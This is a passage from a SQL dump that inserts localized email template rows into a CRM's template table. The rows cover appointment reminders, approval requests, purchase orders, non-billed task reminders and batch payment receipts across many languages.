(2232, 'appointly', 'appointment-cron-reminder-to-contact', 'ukrainian', 'Appointment reminder (Sent to Contact) [ukrainian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2233, 'appointly', 'appointment-recurring-to-contacts', 'ukrainian', 'Appointment recurring (Sent to Contact) [ukrainian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2234, 'appointly', 'appointment-approved-to-staff', 'ukrainian', 'Appointment approved (Sent to Staff and Atendees) [ukrainian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2235, 'appointly', 'appointment-approved-to-contact', 'ukrainian', 'Appointment approved (Sent to Contact) [ukrainian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2236, 'appointly', 'appointment-submitted-to-staff', 'ukrainian', 'New appointment request (Sent to Responsible Person) [ukrainian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2237, 'appointly', 'callback-assigned-to-staff', 'ukrainian', 'Assigned to callback (Sent to Staff) [ukrainian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2238, 'appointly', 'newcallback-requested-to-staff', 'ukrainian', 'New callback request (Sent to Callbacks Responsible Person) [ukrainian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2239, 'appointly', 'appointly-appointment-request-feedback', 'ukrainian', 'Request Appointment Feedback (Sent to Client) [ukrainian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2240, 'appointly', 'appointly-appointment-feedback-received', 'ukrainian', 'New Feedback Received (Sent to Responsible Person) [ukrainian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2241, 'appointly', 'appointly-appointment-feedback-updated', 'ukrainian', 'Feedback Updated (Sent to Responsible Person) [ukrainian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2242, 'approve', 'send-request-approve', 'ukrainian', 'Send Approval Request [ukrainian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2243, 'approve', 'send_rejected', 'ukrainian', 'Send Rejected [ukrainian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2244, 'approve', 'send_approve', 'ukrainian', 'Send Approve [ukrainian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2245, 'purchase_order', 'purchase-order-to-contact', 'persian', 'Purchase Order (Sent to contact) [persian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2246, 'appointly', 'appointment-cron-reminder-to-staff', 'persian', 'Appointment reminder (Sent to Staff and Attendees) [persian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2247, 'appointly', 'appointment-recurring-to-staff', 'persian', 'Appointment recurring (Sent to Staff and Attendees) [persian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2248, 'appointly', 'appointment-cancelled-to-staff', 'persian', 'Appointment cancelled (Sent to Staff and Attendees) [persian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2249, 'appointly', 'appointment-cancelled-to-contact', 'persian', 'Appointment cancelled (Sent to Contact) [persian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2250, 'appointly', 'appointment-cron-reminder-to-contact', 'persian', 'Appointment reminder (Sent to Contact) [persian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2251, 'appointly', 'appointment-recurring-to-contacts', 'persian', 'Appointment recurring (Sent to Contact) [persian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2252, 'appointly', 'appointment-approved-to-staff', 'persian', 'Appointment approved (Sent to Staff and Atendees) [persian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2253, 'appointly', 'appointment-approved-to-contact', 'persian', 'Appointment approved (Sent to Contact) [persian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2254, 'appointly', 'appointment-submitted-to-staff', 'persian', 'New appointment request (Sent to Responsible Person) [persian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2255, 'appointly', 'callback-assigned-to-staff', 'persian', 'Assigned to callback (Sent to Staff) [persian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2256, 'appointly', 'newcallback-requested-to-staff', 'persian', 'New callback request (Sent to Callbacks Responsible Person) [persian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2257, 'appointly', 'appointly-appointment-request-feedback', 'persian', 'Request Appointment Feedback (Sent to Client) [persian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2258, 'appointly', 'appointly-appointment-feedback-received', 'persian', 'New Feedback Received (Sent to Responsible Person) [persian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2259, 'appointly', 'appointly-appointment-feedback-updated', 'persian', 'Feedback Updated (Sent to Responsible Person) [persian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2260, 'approve', 'send-request-approve', 'persian', 'Send Approval Request [persian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2261, 'approve', 'send_rejected', 'persian', 'Send Rejected [persian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2262, 'approve', 'send_approve', 'persian', 'Send Approve [persian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2263, 'purchase_order', 'purchase-order-to-contact', 'japanese', 'Purchase Order (Sent to contact) [japanese]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2264, 'appointly', 'appointment-cron-reminder-to-staff', 'japanese', 'Appointment reminder (Sent to Staff and Attendees) [japanese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2265, 'appointly', 'appointment-recurring-to-staff', 'japanese', 'Appointment recurring (Sent to Staff and Attendees) [japanese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2266, 'appointly', 'appointment-cancelled-to-staff', 'japanese', 'Appointment cancelled (Sent to Staff and Attendees) [japanese]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2267, 'appointly', 'appointment-cancelled-to-contact', 'japanese', 'Appointment cancelled (Sent to Contact) [japanese]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2268, 'appointly', 'appointment-cron-reminder-to-contact', 'japanese', 'Appointment reminder (Sent to Contact) [japanese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2269, 'appointly', 'appointment-recurring-to-contacts', 'japanese', 'Appointment recurring (Sent to Contact) [japanese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2270, 'appointly', 'appointment-approved-to-staff', 'japanese', 'Appointment approved (Sent to Staff and Atendees) [japanese]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2271, 'appointly', 'appointment-approved-to-contact', 'japanese', 'Appointment approved (Sent to Contact) [japanese]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2272, 'appointly', 'appointment-submitted-to-staff', 'japanese', 'New appointment request (Sent to Responsible Person) [japanese]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2273, 'appointly', 'callback-assigned-to-staff', 'japanese', 'Assigned to callback (Sent to Staff) [japanese]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2274, 'appointly', 'newcallback-requested-to-staff', 'japanese', 'New callback request (Sent to Callbacks Responsible Person) [japanese]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2275, 'appointly', 'appointly-appointment-request-feedback', 'japanese', 'Request Appointment Feedback (Sent to Client) [japanese]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2276, 'appointly', 'appointly-appointment-feedback-received', 'japanese', 'New Feedback Received (Sent to Responsible Person) [japanese]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2277, 'appointly', 'appointly-appointment-feedback-updated', 'japanese', 'Feedback Updated (Sent to Responsible Person) [japanese]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2278, 'approve', 'send-request-approve', 'japanese', 'Send Approval Request [japanese]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2279, 'approve', 'send_rejected', 'japanese', 'Send Rejected [japanese]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2280, 'approve', 'send_approve', 'japanese', 'Send Approve [japanese]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2281, 'purchase_order', 'purchase-order-to-contact', 'spanish', 'Purchase Order (Sent to contact) [spanish]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2282, 'appointly', 'appointment-cron-reminder-to-staff', 'spanish', 'Appointment reminder (Sent to Staff and Attendees) [spanish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2283, 'appointly', 'appointment-recurring-to-staff', 'spanish', 'Appointment recurring (Sent to Staff and Attendees) [spanish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2284, 'appointly', 'appointment-cancelled-to-staff', 'spanish', 'Appointment cancelled (Sent to Staff and Attendees) [spanish]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2285, 'appointly', 'appointment-cancelled-to-contact', 'spanish', 'Appointment cancelled (Sent to Contact) [spanish]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2286, 'appointly', 'appointment-cron-reminder-to-contact', 'spanish', 'Appointment reminder (Sent to Contact) [spanish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2287, 'appointly', 'appointment-recurring-to-contacts', 'spanish', 'Appointment recurring (Sent to Contact) [spanish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2288, 'appointly', 'appointment-approved-to-staff', 'spanish', 'Appointment approved (Sent to Staff and Atendees) [spanish]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2289, 'appointly', 'appointment-approved-to-contact', 'spanish', 'Appointment approved (Sent to Contact) [spanish]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2290, 'appointly', 'appointment-submitted-to-staff', 'spanish', 'New appointment request (Sent to Responsible Person) [spanish]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2291, 'appointly', 'callback-assigned-to-staff', 'spanish', 'Assigned to callback (Sent to Staff) [spanish]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2292, 'appointly', 'newcallback-requested-to-staff', 'spanish', 'New callback request (Sent to Callbacks Responsible Person) [spanish]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2293, 'appointly', 'appointly-appointment-request-feedback', 'spanish', 'Request Appointment Feedback (Sent to Client) [spanish]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2294, 'appointly', 'appointly-appointment-feedback-received', 'spanish', 'New Feedback Received (Sent to Responsible Person) [spanish]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2295, 'appointly', 'appointly-appointment-feedback-updated', 'spanish', 'Feedback Updated (Sent to Responsible Person) [spanish]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2296, 'approve', 'send-request-approve', 'spanish', 'Send Approval Request [spanish]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2297, 'approve', 'send_rejected', 'spanish', 'Send Rejected [spanish]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2298, 'approve', 'send_approve', 'spanish', 'Send Approve [spanish]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2299, 'purchase_order', 'purchase-order-to-contact', 'italian', 'Purchase Order (Sent to contact) [italian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2300, 'appointly', 'appointment-cron-reminder-to-staff', 'italian', 'Appointment reminder (Sent to Staff and Attendees) [italian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2301, 'appointly', 'appointment-recurring-to-staff', 'italian', 'Appointment recurring (Sent to Staff and Attendees) [italian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2302, 'appointly', 'appointment-cancelled-to-staff', 'italian', 'Appointment cancelled (Sent to Staff and Attendees) [italian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2303, 'appointly', 'appointment-cancelled-to-contact', 'italian', 'Appointment cancelled (Sent to Contact) [italian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2304, 'appointly', 'appointment-cron-reminder-to-contact', 'italian', 'Appointment reminder (Sent to Contact) [italian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2305, 'appointly', 'appointment-recurring-to-contacts', 'italian', 'Appointment recurring (Sent to Contact) [italian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2306, 'appointly', 'appointment-approved-to-staff', 'italian', 'Appointment approved (Sent to Staff and Atendees) [italian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2307, 'appointly', 'appointment-approved-to-contact', 'italian', 'Appointment approved (Sent to Contact) [italian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2308, 'appointly', 'appointment-submitted-to-staff', 'italian', 'New appointment request (Sent to Responsible Person) [italian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2309, 'appointly', 'callback-assigned-to-staff', 'italian', 'Assigned to callback (Sent to Staff) [italian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2310, 'appointly', 'newcallback-requested-to-staff', 'italian', 'New callback request (Sent to Callbacks Responsible Person) [italian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2311, 'appointly', 'appointly-appointment-request-feedback', 'italian', 'Request Appointment Feedback (Sent to Client) [italian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2312, 'appointly', 'appointly-appointment-feedback-received', 'italian', 'New Feedback Received (Sent to Responsible Person) [italian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2313, 'appointly', 'appointly-appointment-feedback-updated', 'italian', 'Feedback Updated (Sent to Responsible Person) [italian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2314, 'approve', 'send-request-approve', 'italian', 'Send Approval Request [italian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2315, 'approve', 'send_rejected', 'italian', 'Send Rejected [italian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2316, 'approve', 'send_approve', 'italian', 'Send Approve [italian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2317, 'purchase_order', 'purchase-order-to-contact', 'slovak', 'Purchase Order (Sent to contact) [slovak]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2318, 'appointly', 'appointment-cron-reminder-to-staff', 'slovak', 'Appointment reminder (Sent to Staff and Attendees) [slovak]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2319, 'appointly', 'appointment-recurring-to-staff', 'slovak', 'Appointment recurring (Sent to Staff and Attendees) [slovak]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2320, 'appointly', 'appointment-cancelled-to-staff', 'slovak', 'Appointment cancelled (Sent to Staff and Attendees) [slovak]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2321, 'appointly', 'appointment-cancelled-to-contact', 'slovak', 'Appointment cancelled (Sent to Contact) [slovak]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2322, 'appointly', 'appointment-cron-reminder-to-contact', 'slovak', 'Appointment reminder (Sent to Contact) [slovak]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2323, 'appointly', 'appointment-recurring-to-contacts', 'slovak', 'Appointment recurring (Sent to Contact) [slovak]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2324, 'appointly', 'appointment-approved-to-staff', 'slovak', 'Appointment approved (Sent to Staff and Atendees) [slovak]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2325, 'appointly', 'appointment-approved-to-contact', 'slovak', 'Appointment approved (Sent to Contact) [slovak]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2326, 'appointly', 'appointment-submitted-to-staff', 'slovak', 'New appointment request (Sent to Responsible Person) [slovak]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2327, 'appointly', 'callback-assigned-to-staff', 'slovak', 'Assigned to callback (Sent to Staff) [slovak]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2328, 'appointly', 'newcallback-requested-to-staff', 'slovak', 'New callback request (Sent to Callbacks Responsible Person) [slovak]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2329, 'appointly', 'appointly-appointment-request-feedback', 'slovak', 'Request Appointment Feedback (Sent to Client) [slovak]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2330, 'appointly', 'appointly-appointment-feedback-received', 'slovak', 'New Feedback Received (Sent to Responsible Person) [slovak]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2331, 'appointly', 'appointly-appointment-feedback-updated', 'slovak', 'Feedback Updated (Sent to Responsible Person) [slovak]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2332, 'approve', 'send-request-approve', 'slovak', 'Send Approval Request [slovak]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2333, 'approve', 'send_rejected', 'slovak', 'Send Rejected [slovak]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2334, 'approve', 'send_approve', 'slovak', 'Send Approve [slovak]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2335, 'purchase_order', 'purchase-order-to-contact', 'portuguese_br', 'Purchase Order (Sent to contact) [portuguese_br]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2336, 'appointly', 'appointment-cron-reminder-to-staff', 'portuguese_br', 'Appointment reminder (Sent to Staff and Attendees) [portuguese_br]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2337, 'appointly', 'appointment-recurring-to-staff', 'portuguese_br', 'Appointment recurring (Sent to Staff and Attendees) [portuguese_br]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2338, 'appointly', 'appointment-cancelled-to-staff', 'portuguese_br', 'Appointment cancelled (Sent to Staff and Attendees) [portuguese_br]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2339, 'appointly', 'appointment-cancelled-to-contact', 'portuguese_br', 'Appointment cancelled (Sent to Contact) [portuguese_br]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2340, 'appointly', 'appointment-cron-reminder-to-contact', 'portuguese_br', 'Appointment reminder (Sent to Contact) [portuguese_br]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2341, 'appointly', 'appointment-recurring-to-contacts', 'portuguese_br', 'Appointment recurring (Sent to Contact) [portuguese_br]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2342, 'appointly', 'appointment-approved-to-staff', 'portuguese_br', 'Appointment approved (Sent to Staff and Atendees) [portuguese_br]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(2343, 'appointly', 'appointment-approved-to-contact', 'portuguese_br', 'Appointment approved (Sent to Contact) [portuguese_br]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2344, 'appointly', 'appointment-submitted-to-staff', 'portuguese_br', 'New appointment request (Sent to Responsible Person) [portuguese_br]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2345, 'appointly', 'callback-assigned-to-staff', 'portuguese_br', 'Assigned to callback (Sent to Staff) [portuguese_br]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2346, 'appointly', 'newcallback-requested-to-staff', 'portuguese_br', 'New callback request (Sent to Callbacks Responsible Person) [portuguese_br]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2347, 'appointly', 'appointly-appointment-request-feedback', 'portuguese_br', 'Request Appointment Feedback (Sent to Client) [portuguese_br]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2348, 'appointly', 'appointly-appointment-feedback-received', 'portuguese_br', 'New Feedback Received (Sent to Responsible Person) [portuguese_br]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2349, 'appointly', 'appointly-appointment-feedback-updated', 'portuguese_br', 'Feedback Updated (Sent to Responsible Person) [portuguese_br]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2350, 'approve', 'send-request-approve', 'portuguese_br', 'Send Approval Request [portuguese_br]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2351, 'approve', 'send_rejected', 'portuguese_br', 'Send Rejected [portuguese_br]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2352, 'approve', 'send_approve', 'portuguese_br', 'Send Approve [portuguese_br]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2353, 'notifications', 'non-billed-tasks-reminder', 'english', 'Non-billed tasks reminder (sent to selected staff members)', 'Action required: Completed tasks are not billed', 'Hello {staff_firstname}<br><br>The following tasks are marked as complete but not yet billed:<br><br>{unbilled_tasks_list}<br><br>Kind Regards,<br><br>{email_signature}', '{companyname} | CRM', NULL, 0, 1, 0),
(2354, 'invoice', 'invoices-batch-payments', 'english', 'Invoices Payments Recorded in Batch (Sent to Customer)', 'We have received your payments', 'Hello {contact_firstname} {contact_lastname}<br><br>Thank you for the payments. Please find the payments details below:<br><br>{batch_payments_list}<br><br>We are looking forward working with you.<br><br>Kind Regards,<br><br>{email_signature}', '{companyname} | CRM', NULL, 0, 1, 0),
(2355, 'notifications', 'non-billed-tasks-reminder', 'swedish', 'Non-billed tasks reminder (sent to selected staff members) [swedish]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2356, 'invoice', 'invoices-batch-payments', 'swedish', 'Invoices Payments Recorded in Batch (Sent to Customer) [swedish]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2357, 'notifications', 'non-billed-tasks-reminder', 'portuguese', 'Non-billed tasks reminder (sent to selected staff members) [portuguese]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2358, 'invoice', 'invoices-batch-payments', 'portuguese', 'Invoices Payments Recorded in Batch (Sent to Customer) [portuguese]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2359, 'notifications', 'non-billed-tasks-reminder', 'turkish', 'Non-billed tasks reminder (sent to selected staff members) [turkish]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2360, 'invoice', 'invoices-batch-payments', 'turkish', 'Invoices Payments Recorded in Batch (Sent to Customer) [turkish]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2361, 'notifications', 'non-billed-tasks-reminder', 'bulgarian', 'Non-billed tasks reminder (sent to selected staff members) [bulgarian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2362, 'invoice', 'invoices-batch-payments', 'bulgarian', 'Invoices Payments Recorded in Batch (Sent to Customer) [bulgarian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2363, 'notifications', 'non-billed-tasks-reminder', 'dutch', 'Non-billed tasks reminder (sent to selected staff members) [dutch]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2364, 'invoice', 'invoices-batch-payments', 'dutch', 'Invoices Payments Recorded in Batch (Sent to Customer) [dutch]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2365, 'notifications', 'non-billed-tasks-reminder', 'russian', 'Non-billed tasks reminder (sent to selected staff members) [russian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2366, 'invoice', 'invoices-batch-payments', 'russian', 'Invoices Payments Recorded in Batch (Sent to Customer) [russian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2367, 'notifications', 'non-billed-tasks-reminder', 'greek', 'Non-billed tasks reminder (sent to selected staff members) [greek]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2368, 'invoice', 'invoices-batch-payments', 'greek', 'Invoices Payments Recorded in Batch (Sent to Customer) [greek]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2369, 'notifications', 'non-billed-tasks-reminder', 'catalan', 'Non-billed tasks reminder (sent to selected staff members) [catalan]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2370, 'invoice', 'invoices-batch-payments', 'catalan', 'Invoices Payments Recorded in Batch (Sent to Customer) [catalan]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2371, 'notifications', 'non-billed-tasks-reminder', 'german', 'Non-billed tasks reminder (sent to selected staff members) [german]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2372, 'invoice', 'invoices-batch-payments', 'german', 'Invoices Payments Recorded in Batch (Sent to Customer) [german]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2373, 'notifications', 'non-billed-tasks-reminder', 'chinese', 'Non-billed tasks reminder (sent to selected staff members) [chinese]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2374, 'invoice', 'invoices-batch-payments', 'chinese', 'Invoices Payments Recorded in Batch (Sent to Customer) [chinese]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2375, 'notifications', 'non-billed-tasks-reminder', 'vietnamese', 'Non-billed tasks reminder (sent to selected staff members) [vietnamese]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2376, 'invoice', 'invoices-batch-payments', 'vietnamese', 'Invoices Payments Recorded in Batch (Sent to Customer) [vietnamese]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2377, 'notifications', 'non-billed-tasks-reminder', 'indonesia', 'Non-billed tasks reminder (sent to selected staff members) [indonesia]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2378, 'invoice', 'invoices-batch-payments', 'indonesia', 'Invoices Payments Recorded in Batch (Sent to Customer) [indonesia]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2379, 'notifications', 'non-billed-tasks-reminder', 'french', 'Non-billed tasks reminder (sent to selected staff members) [french]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2380, 'invoice', 'invoices-batch-payments', 'french', 'Invoices Payments Recorded in Batch (Sent to Customer) [french]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2381, 'notifications', 'non-billed-tasks-reminder', 'czech', 'Non-billed tasks reminder (sent to selected staff members) [czech]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2382, 'invoice', 'invoices-batch-payments', 'czech', 'Invoices Payments Recorded in Batch (Sent to Customer) [czech]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2383, 'notifications', 'non-billed-tasks-reminder', 'romanian', 'Non-billed tasks reminder (sent to selected staff members) [romanian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2384, 'invoice', 'invoices-batch-payments', 'romanian', 'Invoices Payments Recorded in Batch (Sent to Customer) [romanian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
